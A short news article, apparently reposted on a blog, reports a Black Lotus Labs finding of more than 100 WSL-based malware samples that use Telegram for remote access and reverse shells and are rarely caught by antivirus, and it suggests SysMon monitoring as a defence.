Technology

Caution: Hackers are targeting the Windows subsystem for Linux

Caution: Hackers are targeting the Windows subsystem for Linux
Written by insideindyhomes


Hackers are showing increasing interest in the Windows Subsystem for Linux (WSL) as a target. Security researchers have discovered new malware to match – some to sniff out users and steal data, others to load additional malware.

This emerges from a new report by the online magazine Bleeping Computer. The Windows Subsystem for Linux is now becoming a “popular” target for hackers, especially since WSL allows native Linux binaries to run on Windows in an environment that emulates the Linux kernel.

Recently discovered WSL-based malware samples are based on open-source code that routes communication through the messaging service Telegram and allows the threat actor remote access to the compromised system. As soon as there is access, further malware can be loaded onto the PC.
Infographic Often heard – never used: protective measures on the Internet

Since September 2021, the number of such attacks has been steadily increasing. One problem with this, however, is that they are often not recognized at all – the security researchers at Black Lotus Labs fear that there is a considerable gray area with this. Black Lotus Labs explained that they have detected more than 100 samples of WSL-based malware since last fall. Some are more advanced than others, and therefore more dangerous. Of the samples analyzed so far, two are particularly noteworthy as they can act as a remote access tool (RAT) or set up a reverse shell on the infected host.

Spy tools for login theft

Additional capabilities of the variant include taking screenshots and harvesting user and system information (username, IP address, OS version), which the attacker can use to determine which malware or utilities to use in the next phase of the compromise . The resulting multi-stage attacks often remain undetected until it is too late.

According to Black Lotus Labs, the malicious code samples used were only classified as malicious by two of the 57 antivirus programs on Virus Total. Black Lotus Labs has warned in the past that threat actors are researching WSL for their purposes. How far this has progressed can be seen from the low detection rates of AV providers.

The general recommendation for defending against WSL-based threats is to keep a close eye on system activity, using tools like SysMon to quickly identify suspicious activity.

Download Sysinternals Suite – Windows Tools
See also:


Vulnerability, hacker, security, malware, attack, hack, virus, crime, malware, exploit, cybercrime, cybersecurity, hacking, hacker attack, internet crime, security gaps, Darknet, hacking, hacker attacks, hacker attack, security update, attack, course, hacks, anti-malware, Crime, Russian Hacker, Cyberwar, China Hacker, Malware Warning, Risk, Security Risk, Cyberattack, Security Problem, Cyberattack, Skull, Dead, Dead, Malware Found, Hazard, Skull
Vulnerability, hacker, security, malware, attack, hack, virus, crime, malware, exploit, cybercrime, cybersecurity, hacking, hacker attack, internet crime, security gaps, Darknet, hacking, hacker attacks, hacker attack, security update, attack, course, hacks, anti-malware, Crime, Russian Hacker, Cyberwar, China Hacker, Malware Warning, Risk, Security Risk, Cyberattack, Security Problem, Cyberattack, Skull, Dead, Dead, Malware Found, Hazard, Skull

.

#Caution #Hackers #targeting #Windows #subsystem #Linux

About the author

insideindyhomes

Leave a Comment